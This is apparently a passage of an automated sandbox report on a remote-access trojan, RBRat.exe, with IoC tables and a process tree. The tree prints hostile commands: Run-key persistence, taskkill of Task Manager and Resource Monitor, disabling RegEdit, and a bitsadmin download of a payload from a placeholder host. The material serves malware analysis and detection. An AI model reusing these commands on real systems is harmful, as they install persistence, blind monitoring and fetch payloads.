764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	server.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	server.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	server.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1248	taskkill.exe
Token: SeDebugPrivilege	2404	taskkill.exe
Token: SeDebugPrivilege	2328	taskkill.exe
Token: SeDebugPrivilege	2596	taskkill.exe
Token: SeDebugPrivilege	2516	taskkill.exe
Token: SeDebugPrivilege	440	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	1724	taskkill.exe
Token: SeDebugPrivilege	2916	taskkill.exe
Token: SeDebugPrivilege	1540	taskkill.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	2140	taskkill.exe
Token: SeDebugPrivilege	2544	taskkill.exe
Token: SeDebugPrivilege	2464	taskkill.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeDebugPrivilege	2680	taskkill.exe
Token: SeDebugPrivilege	2760	taskkill.exe
Token: SeDebugPrivilege	2184	taskkill.exe
Token: SeDebugPrivilege	672	taskkill.exe
Token: SeDebugPrivilege	2440	taskkill.exe
Token: SeDebugPrivilege	1788	taskkill.exe
Token: SeDebugPrivilege	1504	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	328	taskkill.exe
Token: SeDebugPrivilege	740	taskkill.exe
Token: SeDebugPrivilege	2292	taskkill.exe
Token: SeDebugPrivilege	2328	taskkill.exe
Token: SeDebugPrivilege	2136	taskkill.exe
Token: SeDebugPrivilege	2204	taskkill.exe
Token: SeDebugPrivilege	2892	taskkill.exe
Token: SeDebugPrivilege	2156	taskkill.exe
Token: SeDebugPrivilege	2584	taskkill.exe
Token: SeDebugPrivilege	736	taskkill.exe
Token: SeDebugPrivilege	740	taskkill.exe
Token: SeDebugPrivilege	1776	taskkill.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	2144	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	1088	taskkill.exe
Token: SeDebugPrivilege	764	taskkill.exe
Token: SeDebugPrivilege	2148	taskkill.exe
Token: SeDebugPrivilege	2744	taskkill.exe
Token: SeDebugPrivilege	2388	taskkill.exe
Token: SeDebugPrivilege	3004	taskkill.exe
Token: SeDebugPrivilege	2264	taskkill.exe
Token: SeDebugPrivilege	2772	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	2332	taskkill.exe
Token: SeDebugPrivilege	2700	taskkill.exe
Token: SeDebugPrivilege	572	taskkill.exe
Token: SeDebugPrivilege	2184	taskkill.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	2728	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	1448	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	2076	taskkill.exe
Token: SeDebugPrivilege	2596	taskkill.exe
Token: SeDebugPrivilege	1876	taskkill.exe
Token: SeDebugPrivilege	2636	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1600	iexplore.exe

Suspicious use of SetWindowsHookEx 54 IoCs

pid	Process
2616	server.exe
1600	iexplore.exe
1600	iexplore.exe
3052	IEXPLORE.EXE
3052	IEXPLORE.EXE
2044	server.exe
3052	IEXPLORE.EXE
3052	IEXPLORE.EXE
1840	server.exe
1784	server.exe
1152	server.exe
1644	server.exe
1824	server.exe
2664	server.exe
2808	server.exe
2712	server.exe
2544	server.exe
2380	server.exe
872	server.exe
2564	server.exe
1328	server.exe
2612	server.exe
2804	server.exe
1516	server.exe
1756	server.exe
1648	server.exe
1728	server.exe
2244	server.exe
2840	server.exe
2532	server.exe
2484	server.exe
2816	server.exe
1076	server.exe
2596	server.exe
2964	server.exe
2368	server.exe
2004	server.exe
1724	server.exe
2840	server.exe
2756	server.exe
904	server.exe
1688	server.exe
2608	server.exe
1652	server.exe
2728	server.exe
2620	server.exe
2120	server.exe
1528	server.exe
2956	server.exe
740	server.exe
1828	server.exe
2808	server.exe
2328	server.exe
1596	server.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2604 wrote to memory of 1504	2604	RBRat.exe	28
PID 2604 wrote to memory of 1504	2604	RBRat.exe	28
PID 2604 wrote to memory of 1504	2604	RBRat.exe	28
PID 2604 wrote to memory of 1504	2604	RBRat.exe	28
PID 2604 wrote to memory of 2752	2604	RBRat.exe	29
PID 2604 wrote to memory of 2752	2604	RBRat.exe	29
PID 2604 wrote to memory of 2752	2604	RBRat.exe	29
PID 2604 wrote to memory of 2752	2604	RBRat.exe	29
PID 2604 wrote to memory of 2752	2604	RBRat.exe	29
PID 2604 wrote to memory of 2752	2604	RBRat.exe	29
PID 2604 wrote to memory of 2752	2604	RBRat.exe	29
PID 1504 wrote to memory of 2152	1504	OnlineClient.exe	30
PID 1504 wrote to memory of 2152	1504	OnlineClient.exe	30
PID 1504 wrote to memory of 2152	1504	OnlineClient.exe	30
PID 1504 wrote to memory of 2152	1504	OnlineClient.exe	30
PID 2152 wrote to memory of 2512	2152	cmd.exe	32
PID 2152 wrote to memory of 2512	2152	cmd.exe	32
PID 2152 wrote to memory of 2512	2152	cmd.exe	32
PID 2152 wrote to memory of 2512	2152	cmd.exe	32
PID 2752 wrote to memory of 2980	2752	setup.exe	33
PID 2752 wrote to memory of 2980	2752	setup.exe	33
PID 2752 wrote to memory of 2980	2752	setup.exe	33
PID 2752 wrote to memory of 2980	2752	setup.exe	33
PID 2980 wrote to memory of 2884	2980	tasklist.exe	34
PID 2980 wrote to memory of 2884	2980	tasklist.exe	34
PID 2980 wrote to memory of 2884	2980	tasklist.exe	34
PID 2980 wrote to memory of 2884	2980	tasklist.exe	34
PID 2884 wrote to memory of 1840	2884	cmd.exe	36
PID 2884 wrote to memory of 1840	2884	cmd.exe	36
PID 2884 wrote to memory of 1840	2884	cmd.exe	36
PID 2884 wrote to memory of 1840	2884	cmd.exe	36
PID 2884 wrote to memory of 2616	2884	cmd.exe	37
PID 2884 wrote to memory of 2616	2884	cmd.exe	37
PID 2884 wrote to memory of 2616	2884	cmd.exe	37
PID 2884 wrote to memory of 2616	2884	cmd.exe	37
PID 2884 wrote to memory of 1944	2884	cmd.exe	38
PID 2884 wrote to memory of 1944	2884	cmd.exe	38
PID 2884 wrote to memory of 1944	2884	cmd.exe	38
PID 2884 wrote to memory of 1944	2884	cmd.exe	38
PID 2616 wrote to memory of 2404	2616	server.exe	39
PID 2616 wrote to memory of 2404	2616	server.exe	39
PID 2616 wrote to memory of 2404	2616	server.exe	39
PID 2616 wrote to memory of 2404	2616	server.exe	39
PID 2616 wrote to memory of 1248	2616	server.exe	41
PID 2616 wrote to memory of 1248	2616	server.exe	41
PID 2616 wrote to memory of 1248	2616	server.exe	41
PID 2616 wrote to memory of 1248	2616	server.exe	41
PID 2616 wrote to memory of 1460	2616	server.exe	44
PID 2616 wrote to memory of 1460	2616	server.exe	44
PID 2616 wrote to memory of 1460	2616	server.exe	44
PID 2616 wrote to memory of 1460	2616	server.exe	44
PID 2616 wrote to memory of 2936	2616	server.exe	46
PID 2616 wrote to memory of 2936	2616	server.exe	46
PID 2616 wrote to memory of 2936	2616	server.exe	46
PID 2616 wrote to memory of 2936	2616	server.exe	46
PID 2616 wrote to memory of 2328	2616	server.exe	47
PID 2616 wrote to memory of 2328	2616	server.exe	47
PID 2616 wrote to memory of 2328	2616	server.exe	47
PID 2616 wrote to memory of 2328	2616	server.exe	47
PID 2936 wrote to memory of 1080	2936	WScript.exe	49
PID 2936 wrote to memory of 1080	2936	WScript.exe	49
PID 2936 wrote to memory of 1080	2936	WScript.exe	49
PID 2936 wrote to memory of 1080	2936	WScript.exe	49
PID 2884 wrote to memory of 1564	2884	cmd.exe	51

C:\Users\Admin\AppData\Local\Temp\RBRat.exe
"C:\Users\Admin\AppData\Local\Temp\RBRat.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2604
- C:\Users\Admin\AppData\Local\Temp\OnlineClient.exe
  "C:\Users\Admin\AppData\Local\Temp\OnlineClient.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1504
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\start.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2152
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OnlineClient /t REG_SZ /d C:\online.bat
      4⤵
      Adds Run key to start application
      Modifies registry key
      PID:2512
- C:\Users\Admin\AppData\Local\Temp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\WINNT\tasklist.exe
    "C:\WINNT\tasklist.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates processes with tasklist
    - Suspicious use of WriteProcessMemory
    PID:2980
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\4BB0.tmp\tasklist.bat" "
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2884
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsTaskList /t REG_SZ /d C:\WINNT\tasklist.exe
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:1840
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2616
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1248
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:1460
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2936
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1080
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2328
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:1944
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:1564
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of SetWindowsHookEx
        
        PID:2044
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2516
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2596
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2320
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2940
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2280
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:440
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:2496
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2156
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1840
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1736
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1724
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2744
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1268
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2916
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:1500
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:2244
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1784
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2296
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2468
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:684
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1044
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2140
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:1264
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2232
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1152
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2544
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2464
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:1340
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2160
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:852
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:1088
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:736
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1644
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2760
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2184
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2620
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2224
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2168
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:616
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2392
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1824
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:672
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2440
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:1260
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2036
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2448
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1788
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        Delays execution with timeout.exe
        
        PID:2428
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:272
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2664
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1504
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2684
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2456
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:372
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1804
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:328
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        
        PID:2324
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2808
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:740
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2800
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:2436
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2024
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2328
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:1840
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:1980
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2712
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2204
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2136
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:1752
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2892
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:1788
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:2704
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:2468
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2556
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2544
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2584
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im resmon.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2156
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\WINNT\Temp\server.bat" 0"
        6⤵
        
        PID:2664
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WINNT\Temp\uploader.vbs" 0
        6⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com %dir%\file.exe
        7⤵
        Download via BitsAdmin
        
        PID:1060
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "server.exe"
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:736
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 8
        5⤵
        
        PID:1612
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 30
        5⤵
        Delays execution with timeout.exe
        
        PID:2836
    - - C:\WINNT\server.exe
        
        C:\WINNT\server.exe
        5⤵
        Disables RegEdit via registry modification
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2380
      - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im taskmgr.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
